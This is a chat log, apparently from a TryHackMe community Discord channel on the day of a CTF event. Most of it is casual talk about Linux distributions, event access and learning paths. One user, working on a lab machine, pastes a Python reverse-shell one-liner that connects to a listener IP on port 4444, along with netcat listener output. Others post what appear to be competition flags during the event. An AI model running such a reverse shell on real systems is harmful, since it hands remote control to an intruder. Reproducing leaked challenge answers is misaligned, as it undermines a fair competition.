#general
1 messages ยท Page 953 of 1
I'm immune to persuasion to watch anime.
The same studio created demon slayer, fate was their debut
Huh, so nobody wants to play KOTH?
I'm just not good at it
Fair, it's a...steep learning curve.
Good news is that the brain (regardless of you being a human, guinea pig, or cookie) is literally designed to adapt and get better at things over time.
disk size for linux should be 20gb?
playing KOTH on a steamdeck is cursed.
Depends on how much you want to install
๐ฉ just might have to give it a chance. I remember seeing watch order and then dropping the idea of watchinh
That's understandable, I'm working on my enumeration, so if you ask me next week, I might just get on
hang on, my steamdeck is er...having issues with memory, lmao
I don't really like how they did it like android, a filesystem for rootfs and filesystem for user, it makes things harder..
need to install mysql, don't have enough mem, haha.
Its a long long series i know lol, but it's worth it, I like long series as i like the storybuilding
Even their side series have better animation
Take fate: strange fake for example
I was thinking of purchasing a steam deck once, got a laptop instead
Might put on my own OS onto it, and/or upgrade the internal memory, so..
Say..Kali, haha
I'll call it the..hackerdeck
That's exactly what I was gonna say lol
haha
hey how can i verify myself as a student in hackfinity battle
Hello
hi
Tf
Why did u ruin your steamdeck with kali?
haven't--yet.
No, no, no, I am the deranged one and I am telling you that's just a bad idea
That may be true, but I am more deranged than you.
Scratch that out.
Cmon man be reasonable
But seriously, I made a backup so it's gonna be fine even if it breaks..horrifically.
What if it bricks it?
Beyond repair?
Maybe
It's going to be a pain, but it's still going to be recoverable.
Alright.
You are occupying 20GB of your precious storage
Load it on an external drive and treat it like a live boot
Ok, fine, you win
And then use that live boot to install kali onto the microSD card, then link that to your grub
That way you can have SteamOS AND Kali.
use arch not kali
yeah, arch is better, kali tends to er..break easily.
honestly i've had more kali problems than arch lol
i don't use kali anymore
kali is useless
unless it's like the only thing you have access to.
To be fair.
why would you not have access to anything else
once you learn basic hacking you realize kali is useless
Well, duh, it's meant to be more of a..library of tools than anything, and it sometimes fails--epically. But again, that's hypothetically speaking. Additionally, yes these tools are useless when you know how to make your own.
I just thought it would be funny.
fair ig
that's true but it just feels like everyone idolizes kali linux when it's nothing to idolize
just..... install tools when needed as you go it's just as good if not better
That is true. No need cluttering your system.
Buut mine is always cluttered, umm, I just work on too many projects at the same time soo..
Probably to make lives a little bit easier (while making it worse)
DIE ^
Wait, can't this just be done via type?
might be thinking about something else though...
it also does stuff like detects packing in binaries, detects crypto functions, YARA rules, you can extract files at offsets too
some can be done with file but it has much much more
like entropy
yeah file
file is good but not the best
i've had a few times where i just go you are stupid there's no way its that
haha
Question about Hackfinity. Are we allowed to post writeups after it ends?
Who pinged
Ah
Me
But it's okay, I answered my own question with level-1 osint
Thanks anyway though ๐

Give me funny mems
Memes
๐ ๐ ๐
I love cookies black
๐
Please I face problem
Hey friendly reminder to everyone if you use Kali Linux youโre a fucking noob
Thanks ๐
That's nice.
Almost forgot that , thanks for the remainder ๐ ๐
Gave +1 Rep to @pastel plinth (current: #1800 - 2)
Hi! Need a little help.
#assembly code, a .s file
.section .data
.section .text
.globl _start
_start:
mov _start, %ebx
mov $1, %eax
int $0x80
running echo $? returns 139, but chaning the line mov _start, %ebx to mov $_start, %ebx returns 0. But the internet says both are moving the address of _start to %ebx, why the difference?
You're right, Kali is great for new people, could have made the advice more friendly though.
The issue is how the assembly treats _start vs $_start. mov _start, %ebx tries to move the value at the _start label, which can be invalid, causing a crash. But mov $_start, %ebx moves the actual address of _start, which works fine and doesnโt crash.
No one should use Kali
What are you doing?
What should they use?
@pastel plinth learning assembly from a very old book, programming from ground up", thanks for replying btw.
Maybe they should stick to Kali, that way they know it works.
For school etc?
wanting to be a bb hunter. How competitve is that platform, do you know?
Not very many programs I've seen require assembly, but okay.
Are you doing one right now?
Wanting to make sense of comp science, that's all. Nope, not doing one right now.
Hello,
Do anyone know how to extract code in androguard?
Slept on my sofa, best sleep Iโve had for a long time
anyone who is preparing for ceh practical exam
Maybe someone in #cyber-and-careers ๐
okay bro
Ok

Is it started?
Hey everyone
hello
The event?
Not yet,
https://discord.com/events/521382216299839518/1347603284893896844
Should be time stamped to you.
@sage copper sup
@quaint ferry Hello, can I assist you?
Hello
Gud day 2 ol
guys help with this lame pyrat machine !
import os,pty,socket;s=socket.socket();s.connect(("10.23.78.153",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/sh")
name 's' is not defined
โโ$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.23.78.153] from (UNKNOWN) [10.10.168.2] 50884
3 years in try hack me , and im understand that half of my education is dealing with shit like that
i do every thing step by step but nothing works , lame machines ..,
When i use telent with :
import os,pty,socket;s=socket.socket();s.connect(("10.23.78.153",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")
i recive error name s is not defiend and the nc connection is droppped
Try posting this in #room-help
ok
Please verify your account and post in #1347596231551225887
๐ง
idk bro, im a developer dabbling in cybersecurity, kali is pretty great for me, has all the tools, dont need some further setup, interface that i know and love
all tools are good depending on how you use them
Guys I'm unable to make payment for premium , 'card issue bank declined it's says, what can I do
Do you have international payments on?
so true bestie!
what should someone use then?
bug bounty programs are highly competitive and automated, i would not do that as a "career" but mostly a side hobby for your career
I know i'm a fucking noob ๐ฅ ๐ฅ ๐ฅ
lmao fax
we knew this from our dms
Nope
Turn them on, then try.
Failing that., contact your bank then THM support.
Ohhkay thanks
Gave +1 Rep to @sick lance (current: #2 - 3527)
avg arch user
Shrimp
Hello Everyone ๐
I got a small question, i registered a Team for the Hackfinity Battle, but i'v got this small message on this box :
This challenge is limited to student only >> Where could i ask someone to check if we can access to the challenge with my mates ๐ ?
I bought the cat some treats yesterday and he ate some shrimp
Check out #1347596304964124768 or #1347217239492919346
Thanks โค๏ธ
Shrimp treats for the cats, nice ๐บ
@cloud quiver fancy cars ๐ฎ https://www.youtube.com/watch?v=ZblO93J2DwQ
if anybody needs 2boosts let me know
2 boosts for what?
Got some different ones, there was a whole fish one and I think that was his favourite
He was such a menace last night though. He kept attacking people in their sleep.
Haha, living his best kitty cat life!
๐ธ
I want to sleep with him๐
suddenly(
@formal steppe Please can you verify your account and post in #1347596231551225887
guys how can I start this Hackfinity Battle lab, basically this is the CTF
I explored it but I didn't get any information??
Event starts in about 4h ๐
@sick lance how to join staff?
Apply for their jobs.
understood
Are you telling that, it will start after 4hr
2pm british time
sorry to bother you, if you got time, then reply. If mov $_start, %ebx moves the actual address of _start, then why echo $? returns 0 to the standard out, i.e. terminal window?
#programming please.
ok...
But I open the machine there is not showing to start the machine.!
It's not started yet.
It's only 1006.
It will from 2PM yes.
2pm uk time - in your timezone it will be different time ๐
This is my first attempt on the lab so I confused, ๐
In India it is 7:30??
hey where are teh challs
Ok bro thanks you so much, for guidance ๐
Gave +1 Rep to @sick lance (current: #2 - 3528)
a machine keeps telling me the connection is unstable, when i play games i experience something similar sometimes, I am not awful with networking but having a hard time pin pointing what is the issue, is there a way to see why the machine says the connction is unstable?
Done!
i mean in a tryhackme server do people really expect that to work lol
...You'd be surprised.
Anyone will do be tempted with free stuff.
Especially 50$ steam.
not wrong
i cant access the hacfinity battle
I guess i came at a bad time haha
where are the challenges?
Event starts in about 3.5h ๐
ohh my bad
if i'm not a student, can i still participate in Hackfinity?
Yes, you won't get prizes, and you still need to be registered.
oh
Hi, may I know how to run โmsfdb initโ as a non-root user in the attackBox? Thank you.
You need to create a new user, however msf is already initialised on Attackbox
๐ค I'm curious if THM dismissed or canceled exclusive rewards for first 100 people who passed SAL1 , seen so many people passed it and I think it possible surpass that number already
Have you seen 100 people pass? ๐
I'd assume so.
I don't see the number yet so I'm not sure
I still get an error to run it as a non-root user. Do I have to do something else? Thanks again
Gave +1 Rep to @sick lance (current: #2 - 3529)
Seen in LinkedIn that many people keep passing 
Especially in my country, already more than 10
Spent about 100 hours sorting complex data, and I just realized that everything is inaccurate by at least 10% ๐
Should've checked that at the start
I prefer limos over these supercars ๐
Where did u get that pfp๐คฃ
what the f
what counts as a student?
Somebody currently in an academic institution learning?
no
oh ok
Event started???
no
From when
rn we are at 80% cpu usage
Can we please not post random links/ip etc to have users stress test, or test in general.
We cannot confirm if you own what you're doing.
ok , but its my website only
Please don't DM without asking.
Good mornin'
I'm trying to recover my old THM account. Is anyone able to point me in the right direction?
Only via email.
Thanking you kindly
Good morning chat!
๐
Does this show up for student teams also?
Yes.
Any way to verify my team has verified their student status entirely?
oh, i didnโt know, sorry๐
You can ask your team, THM won't give out details relating to accounts.
ayo i'm confused between hacking and ai machine learning i wnat to make money as well as enjoy programming like ai but i'm confused what to choose ai or hacking so if i want three votes 1: hacking 2: AI
Plop
we got a channel for cyber and career... but I am afraid you shouldnt rely on "internet people" for such a decision
you can use this channel https://discord.com/channels/521382216299839518/707992725646999553
to understand more about the area though
hey i want to join the hackfinity room can any one invite me
hello
i have an issue with with tha challange room, i have registired as a student but i cant enter the rrom?
Don't look at demand or salary stuffs like that. Just find yourself and your passion
find a way to combine them
color check 123
You donโt understand youโll get backdoored keep using Linux ๐
Are there any French people in Discord?
Explain. Dont use that elitist attitude.
and idc if i get backdoored, its a vm that gets zapped out of existence after each restart
Anyone else have problem accessing the hackfinity room
It says room is locked
Eh dudes just rage baiting
When you run mov $_start, %ebx, it just loads the address of _start into the EBX register. This doesnโt affect the exit status of the program. The exit status, which is what echo $? prints, is usually set by the program when it finishes. If you donโt explicitly set an exit status (like using a system call), the default is 0, indicating success. So, even though you moved the address into EBX, unless you tell the program to exit with a specific status, echo $? will return 0 by default.
If you donโt care about getting back doored keep using it.
Fucking idiot lol
explain it then?
@pastel plinth please don't be rude to our community members because their views to align with yours.
Same here
@scarlet umbra @lime belfry The room will likely be unlocked once the event begins
anyone tried the jaws-r-size thing for helping strengthen your jaw?
bro cant even care to explain....
Compile command: grep irn backdoor
you didnt explain
Type in that command line itโll explain for you.
hey Guys, when will the hackfinity CTF start?
<t:1742220000:F>
thanks ;)
Gave +1 Rep to @void thunder (current: #461 - 13)
where do i go to report a bug
or just like display it
I can only imagine he's referring to the XZ-Utils backdoor found in certain Linux releases. https://www.kali.org/blog/about-the-xz-backdoor/
As of 5:00 pm ET on March 29, 2024 the following information is accurate. Should there be updates to this situation, they will be edited onto this blog post.
The xz-utils package, starting from versions 5.6.0 to 5.6.1, was found to contain a backdoor (CVE-2024-3094). This backdoor could potentially allow a malicious actor to compromise...
interesting, finally someone who has answers
This can easily be checked via version installation, and easily remediated: apt-cache policy liblzma5
okay nice i will do this :)
The main issue with Kali would be related to the fact that the default user space will put your system interactions with elevated privilege
Having root as a default main account within a system causes any network and process spawns to be insecure by default
Yes of course, I use Kali cuz it gets the job done
This too can easily be fixed by creating a non-privileged user account.
damnit what should i use then
Jai seemingly, according to @pastel plinth
please dont say arch
At the end of the day, what it really comes down to is; Does anyone really care enough to target you, and is your system within a secure enough network.
LMAO arch elitist gonna attack you be careful
You can never fix stupid and you can't predict future vulnerabilities.
Yourself?
ok yes i use a mac
I use ubuntu on my personal notebook having other virtual machines in there.
For my work I chose to use windows because it should be easier to handle some applications. But im considering getting a mac when the time comes to change (company policy)
I use Debian and it does everything I need it to do.
i use arch btw
nowadays machines run VMs so well
If another Linux flavour does what you need to achieve, then you should sit where your comfort is.
negative aura
the question is.. what does Linus use?
He flips logic gates manually
do you have linux experience ? if not, start with the user friendly ones. Ubuntu etc
this one
im about to chatgpt what this means lmao
nahh bro
thanks ")
Gave +1 Rep to @modest charm (current: #820 - 6)
I dont like it
may i interest you on UWUbuntu then
No offensive
Some people don't have the understanding of protocol and application based interactions to write their own tools and that's fine. That's where things like Kali and ParrotOS find their place within the market. As they come with tools you might not know you need, so it throws the whole shelf at you.
after getting more experience, then you can start moving to other distros like debian..and then other more obscure ones lol
No is not
Mithrandir, The Grey Pilgrim, Olorin, Gandalf the White
I know your names, ancient one
๐ง๐ฝโโ๏ธ
what is your favorite movie of the Tolkien-verse
i would ask what books but i havent read them ๐ญ ๐ซข
all of them lol .. but well the lotr movies are def better than the hobbit. And I havent watched that Rohirrim animation
strongly agree. seen rings of power?
the first season only... for some parts it was ok, for some others it was quite bad imo
but I lost interest in trying to watch the second part
yeah i use arch 
i just failed that so hard
thats so dumb how i select a gif and it auto posts in chat
an arch user would never fail
i didnt get a chance to caption it
use arch
it was pretty bad yea.. should've been left to Jackson
lots of people enjoyed it though. good for them lol
personally it was just too different than the caviar i was used to
i cant access the room
if we take the quality of the show itself, taking into consideration they had "infinite budget", it was quite bad.. poor battles.. poor scenes... many fails..
And if we consider the story then it all falls apart
No advertising in here please. ๐
objectively you're correct
it had a huge budget
how can i change time zone from uk to india
you gotta use arch
im still pissed one of the first scenes of an elf fighting was him basically getting his ass whooped by a regular orc.. not even uruk-hai..
Hey guys i have a question
@pastel urchin
it's about the Hackfinity battle
No, I use Kali.
#1347217239492919346 please
thanks for help
Gave +1 Rep to @sick lance (current: #2 - 3530)
Ooooooh gonna get XZ backdoored
According to this other guy yeah
The other guy is here to troll, they've ignored me all day.
No way I thought they were not rage baiting
hello peeps. can someone help me how to connect my id with discord . to get the roles as well
anyone here ever used pywin32?
Follow the link.
team size please
thanks brotha
Gave +1 Rep to @sick lance (current: #2 - 3531)
No worries sister. ๐
i am not able to buy premium i have contacted bank everything is fine there side and i tried everything it still shows your bank declined
breh ....
why changing my gender?
@sick lance help
contact support
we're not brothers, ๐
I told you what to do earlier.

@slow cloud can you say the thing
I use arch 
pfp checks out
new outlook is so bad
Outlook is a dumpster fire.
Just another web wrapper, no POP3 is probably the worst of it though
30 mins to go
until?
Hackfinity
Every time i run any metasploit exploit, it says "Exploit completed but no session was created" i tried everything but nothing works
Is this THM?
Yeah, in 27 minutes
No Kali
have you tried arch 
Are you doing THM?
Yes i tried the blue
hi how do i know if my team is 100% students? is my team supposed to appear somewhere on the leaderboard
You will have to confirm with your team members if they are students, but yes, you will appear on the leaderboard if you meet the requirements
<t:1742220000:F>
Ask them.
ok thx
Gave +1 Rep to @void thunder (current: #426 - 14)
But yes, that would be a good way, there is more than one page for the scoreboard for this event.
theyre saying they verified but im worried cuz i dont see my team on the leaderboard
in any non-team room if i do a task i see myself at 10th
Yes, like I said, go to scoreboard, there is more than one page.
alralr ty
There is currently 277 pages, best of luck 
is it possible to obtain a csv/table of teams participating?
or somehow search for my team?
i hate that discord added hidden channels
tryhackme's attackbox is slow to respond today, is it because of Hackinfinity?
yeah
oh i didn't evefn notice it was a thread
this event will be like DDOS for servers
Unfortunately, OpenVPN traffic is blocked in my country
dang
๐ญ
I can only use attackbox
why is it blocked
Still undecided.
I have 13 min(s) to decide, so probably not.
IDK
wait it starts today
yep
Yup
Goverment restrictions, I'd assume.
But it is so
Wow
#site-support please
I have only 5mins to decide
#1347596231551225887 please.
Thank you so much
goodluck guys
good luck!
(pls let me win tho)
hi guys! is the 11.2 dollar student subscription not a thing anymore?
Monthly, no.
Unfortunately not for the monthly sub
Too late for me anyway

Hackfinity battle: "open to all anyone can join" then u click it and "only for students " ๐
YEP
that's what got me
but now i cannot do anything on thm, even my pfp doesnt' load
simply cut that tab, if ur team consists of students only
Site getting overloaded haha
All can join :) only students can win prizes
Only students can win prizes, everyone can take part.
GLHF everyone!
it depends on what psotion you place
hi everyone!
It's 30k in total
im going to be rich
I am going to be optimistic and say that in the best case scenario my price will be that sweet sweet certificate ๐๐๐
yes
Nice
wbu
Yeah
thanks for clarifying, any points awarded? or none for completing?
Gave +1 Rep to @mossy river (current: #6 - 1532)
I can join you if you want though
Iโm not sure, @carmine belfry are points enabled for questions?
@mossy river the link aint working
it's a blank page
i think there is too much load on the site right now
i think the website is struggling
yea also
are u competing alone?
Give it a few minutes to load ๐
Yeah
i can't even complete a task in a different room
cuz my team has more than 20 players and they are all beginners
I was completing a random room and the servers went down ๐ฟ
same
An error has occurred, please try again its say this on my website ๐ฆ
the website is down?
it's just overloaded I think
my team is all students but it says we arent?
Yes, custom points, you can see the amount on the top right of the challenge cards or in [] next to the questions
i am the only player on my team, id rather participate alone tbh, but good luck to u
-unmute 847848984319229952 please donโt try to ping everyone here
๐ Unmuted guccifer_2.0
got flag and website went down ๐ฅฒ
how many points we get when we finish hacfinity?
Alright, no problem, if you want me to join your team, just hmu
thanks, I assumed it was only students that get it
challenges are taking to long to load ๐
fr
YOO WE DDOSED THM
Hello, everyone
The site isn't working lol
Its up again
lmao
How can I join a team ? I don't have one
Bruh just wait until shit loads

He already told you
website crashed !
hey you fellas, can you stop using thm for a sec so i can win????
looks like it's back.. for now
it will be goin in cycles, servers down we cannot enter thm -> thm goes live, we all fucking raid this site all at once
lmao
yea
jesus the lag is bad
it's terryfing
Ah sorry, didn't read the other message. let me double-check! Not 100% sure when it comes to that.
LAG..... ๐ฉ
/500 
hey look, TryHackMe has a site wide room on DDoSing!
the site is basically irresponsive now
Why is my team still not showing up? Weโre all students
Good luck to the students
Good luck everyone
THM site not loading?
@lapis berry please verify and post in #1347596231551225887
oka its back.
Nooooo My STREAKKKKK
need flag location for LLM challenges @jagged yarrow
๐ฅณ ๐ฅณ ๐ฅณ
Is it just me or does the leaderboard not show the highest ranking people? I think it shows the earliest registrants
Successful tryhackme in the DDOS attack state to achieve a winning streak
u dont
okk
@sick lance cant use the bot again for 7 mins so sorry
n
i cannot verify my acc with the token ๐ญ
^ that should help
thanks alot ๐ญ
i just got a 99% percent attack on CoC but only got 1 star
my dogshit troops did not attack the townhall 1 bit
Is there a way to see my place in the leaderboard? Just if I were to scroll to it, right?
@sick lance Hey can I get access to advanced channels please? OSCP/OSEP creds should be linked through offsec discord
cant see task 4 or 5 for our team
will the hackfinity battle room be available even after the event?
up
Is there still time to join a team?
I wonder
My cat just looked into his water bowl and hissed ๐ฅด must have seen his own reflection.
Has THM ever had like a breach anything?
I'd imagine a lot of people try to hack into THMs servers
How often hackfinity is held?
Well I suspect they have really good security engineers and probably Pentesters try within RoE and stuff
Well yeah I'd imagine they have a lot of pentesters and iirc they do have a bug bounty program
Is it just me or does the leaderboard not show the highest ranking people? I think it shows the earliest registrants
First time ever
under uk data protection laws if there was a breach theyd have to report it
so no there hasnt been one
You know you are cooked when you cannot solve an easy challenge
bad infra - 1 rating CTF
Uh
๐
Hello i am at the very start of the cyber security basically taking the cyber 101 path. When will j be able to participate in some challenges like hackinfinity
After i complete it or i have to do a lot of stuff before
fair enough let us know if its the case
What do you mean? There are no requirements to join, I think
What is the support email? The one given on the site returns address not found(support@tryhackme.com)
I mean will i have the knowledge to participate after the cyber 101 sorry for disturbing you guys with stupid questions i just want to move from learning to practice
There are no stupid questions!
Well, honestly I think that depends
I appreciate that ๐
I personally think that in Jeopardy Style CTFs, playing them has helped me more than doing rooms. For me atleast it is about failing and then understanding why. I think most rooms are based on theory which is important for pentesting and stuff but CTF I am not that sure if it is all that necessary for attempting easy challs
IT START
is blockchain not working?
Thanks a lot for that ๐ do you mind me dming you for some questions?
Gave +1 Rep to @brisk hawk (current: #2745 - 1)
Feel free to DM me, yeah :)
Who wants to join me on the hackfinity?
You need to be intermediate --> advanced
either or
is it only me or thm is very slow ?
machiens shut down suddenly bruh
do we need to encode in task 7
can i do all the challs in my machine using VPN?
because attack because givin me 1 hour limit
I feel like were gonna be put on slow motion soon
Yes you can.
Damn this is hard for me
real.
(1)
I'm hella overthinking the OSINT bruh
same especially the task 7...
Yea bruh dont know how two man kissing can be an encoded position..
what lvl are u?
task 7 osint
ez fr
yea what lvl on thm in general
im level 6 only
bruh im dumb af
i mean if u wanna dm we can try together js for fun
two brains better than one
sure
Sent u a friend request
Hey, let's solve this together! I'm stuck on the same thing.
what about 3 brains ? ๐
hello regarding the ctf that started today where can i see its challenges ?
(1)?
Accept my request
done
Excellent way to network 
please ????
#1347217239492919346 has the link at the top.
just search hacktinity battle
me too pls
Its web
#1347217239492919346 please ๐
i might just pay the 0.5 btc
Is this an okay channel to post general questions in?
my attackbox time limit is finish how to connect vpn to continue?
Are you asking about the open VPN you use for every room?
I mean is there any way to overcome this situation?
Thm has a dedicated room just on setting that up for each operating system. That was really helpful for me.
If ur talking about OVPN
Wallpaper of the day:
hello , i was doing the ai room , and i am not getting any response back , do i have to wait more?
I wanted to ask anyone who took the SAL1 if they thought it would be adequate prep to do SOC1 learning path, SOC 2, SOC simulator and the 4 recommended labs. Not sure how else to prepare for it or if you can be "prepared" for it
Is there a way to see where I am on the leaderboard?
same happened to me
hey i got response , after waiting a whole 10 min , now its smooth
oh good good
Anyone doing forensic?
any hint for stolen mount? i found hidden_stash.zip but nothing interesting
me
Same situation
I imagine as it's a competition, there is no hints, however #1347217239492919346 is a better channel.
idk if i extract it wrongly lmao, and does the machine attached not include tshark? itd be much easier imo to extract
I am wondering the same, especially if we can see our current standing in the leaderboard
Please use #1347217239492919346 for the chat for questions.
does anyone have this problem where i submit a flag, its correct and after refresh it dissappears and i may have to submit it again?
if I am alone in a team do I still appear in the Leaderboard?
Are you a student, signed up witha student email?
What is a student definition for hackaton?
yes
Then yes, you'll get on the leaderboard if you make top x
I learn by myself outside of universities so I am a student am I not?
aight haha i wont
Not with that attidue ๐
im baby yoshiiiiiiiiii now >:)
can anybody help me out
i was in vs code
i saved the .html file
and now i cannot edit it
plese help
its ahh
nvm i grew up
Hello could you win or get anything if youre competing in the hackinfity battle as a non studetn
nope
Not even a certificate?
idk about that but you cant win any actual prizes
ig certificates are being given to rank 10th
Hello guys, can someone help me out ? I'm stuck on Common attack task 2 while i think i found the answer i can't seem to put in the answer tab
btw can anyone guide me where can i learn more abt cyber security for free of cost and kinda become a intermediate pentester?
and pwn college
what im currently using it has more logic
well not more but teaches more logic for free
does it have like site tasks alongside the course like the ones in tryhackme rooms?
(never tried tryhackme premium)
iits free for some starting rooms isnt it?
i think most of thm is free i forgot the percent age
ye it jus kinda reminds once then its free to use ig
I'm gonna do tryhack > picoctf > hackthebox
k one more thing wht device is suitable to handle linux or kali linux?
oh wait your new?
the lowest i ever seen was a microwave ๐
yes im new
definitely start with tryhackme then
i saw arch on vape ๐
nah help me out pls๐
OOOOH i frogot about thatt
bro every computer is suitable for linux
what i meant was pretty much anything lol
after tryhackme should i go with pwn college or picoctf?
A computer that has the minimum requirements
mine is 4gb ran 64 bit processer am i good to go?
Thatโs a suitable laptop
Look at the min requirements for Kali
Youโll have your wonder
Answer
just start with tryhackme and you will know when the time comes
k thnx
i never understood how people smoke
Nicotine is fantastic
it simple really you just light it and inhale 
no i meant knowing that your frying your lungs and it also stinks
lol
k thnx bro
or why people tried it noting you could really when you get to that point
yw
also if you need help with any rooms you can go to #room-help
addiction like any other really
it feels good
yeah that why i send this one
Peer pressure
Or curiousity
Wanting to be a rebel
task 7 is so hard
Etc
did anyone complete it?
people keep trying to per pressure me
Hello, inside the โHeistโ blockchain, i made the function return true, but no flag. What am i missing? I achieved the goal it asked
1 day?
what room should one join after the starting offensive and defensive one like to move one towards pentesting basics where do i access those rooms?
what experiences do you have
nthng i'm a highschooler trying to get into cyber security
Probably the pre-security path
THM has its own learning path, which is pretty good too
you should prob stick to learning paths like introduction to cybersecurity, pre-secruity and complete beginner
also im a highschooler toto :D
What grade are you in?
Exactly
11
premium one that the site opens up when someone uses it for the first time?
nice
It also has a few modules for free too
No
pretty hard to find any other highschooler that are into cybersec at my school
whos looking for team members for hackfinity here
why not
I wanna be in 10th grade
why
Because
I am
yes im doing the free ones rn wht should i do after i complete those should i switch to the free one?
I started studying too late
thanks ๐
Gave +1 Rep to @blissful snow (current: #531 - 11)
It's never to late to start
maybe start studying instead of chatting
not really you can get a lot done in a few months
ima dm u then
you welcome
ima dm u too
If you can, you could pay for a month and grind the full path from pre security, cybersecurity 101 and offensive pentester
I'm doing it myself too
Maybe
But it could've been better if I started earlier
yeah but you have time now
nah i can't pay it rn my tution + school fees r too high rn
you could get a discount for students
Yeahh
how can i know if i got first blood ?
alright :D
linux or kali linux im a beginner wht should i download?
Or else you could complete the free ones and just learn everything from google
you will see on the chart you should be at the top and earn more points than everyone else
k thnx bro
Guys should I focus on my school work or lessen it and give myself more time to focus more on other skills
Everything is free if you know how to search๐
i ment for a challenge i want to know if i got first blood on task 28
balance them
oh not sure
Both are not that different, kali just comes with pre installed tools that you need for pentesting
bloot 
so should i opt kali?
kali is pretty good for beginners
If you want to get into cyber, yeah
bcuz i want to be a intermediate pentester tht too offensive?
do you know how to install kali?
learn he basics first
not of pen testing just general skills
yes i would but i was jus askiing for future refrence
@plush needle
ok
ohh most of the thing you will find out of time
@mossy river
Trueee๐ซก
their coming to ban you ๐จ
./report tryhackme bot
:hammer: aubadobrazil#0 has been banned.

๐ a day to wear green
hey all ๐ hosw are we to night
Ty 
Gave +1 Rep to @loud marlin (current: #25 - 393)
i forgot ๐ญ
why its wrong
raw_burger_n_bar
free rep
Wrong where?
but you are yoshi, so a pass
i don't know, i've seen what yoshis do with eggs.. never trust 'em
high school kinda give up on celebrating small holidays
lol
battle ctf first osint question
By the way, are 2-3 hours of studying thm enough?
Per day
do you think the username change was good
More than enough
yes
well it depends on how you learn
but don't over walm your self oh you won't learn nothing
yoshi r u using kali rn?
parrot security lab
i used a lot of operating system and i just feel comfortable on parrot
did u use kali yet?
yep
i swap between kali and parrot but i like parrot more
i used kali, parrot, debian, ubuntu, fedora, blackbox, and i forgot the rest
where did u download kali from ?
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
I actually started off on linux mint its not recommended tho
comes with no tools
isn't there a microsoft store method?
wsl??
oh and btw don't mind your rank on tryhackme just because the rank is HACKER does actually mean you are one
yes wsl
k ill keep tht in mind
kinda based on windows variant
linux mint?
were talking about kali and kali enjoyer pops up lool
no
wht do i at choose ur platform?
?
choose ur platform installer images and virtual machines tht part
what u prefer?
idk im new
THM{boteco_do_cesinha}
THM{raw_burger_n_bar}
WTF I cant even searching im in
it depends on your plans for use
u tell me wht a beginner should choose?
?
just learning rn i want to be a intermediate pentester
Hackfinity Battle
i cant find the resturant
if ur PC allows just work on VM on kali but with window as main OS
Small help. Why is it showing it's only limited to student teams?
I on't think we can help with that
I verified as student
@stiff zodiac
Osint? All the best
4gb ram 64 bit processer does my pc allow ?
4gb ram? It might lag but it should work
yeah bro
?
if you are ready to make sacrifices for the quality of Windows
By the way , ??? Help in this pls
its ok
student team are eligible for prizes
am i about to become a shadow wht the hype bro๐ญ
check the https://discord.com/channels/521382216299839518/521771811768107008
you are not the first asking it seems
A hacker embodies a boundless passion and insatiable thirst for understanding the complexities of a system, computers and networks in particular. They revel in the pursuit of knowledge and mastery, constantly seeking new solutions and opportunities for growth. Their drive and innovative spirit inspire and are inspired by the hacker community, where ideas and knowledge are freely shared and valued regardless of their origin.
-- Silk
Seems like a common issue then alright
its k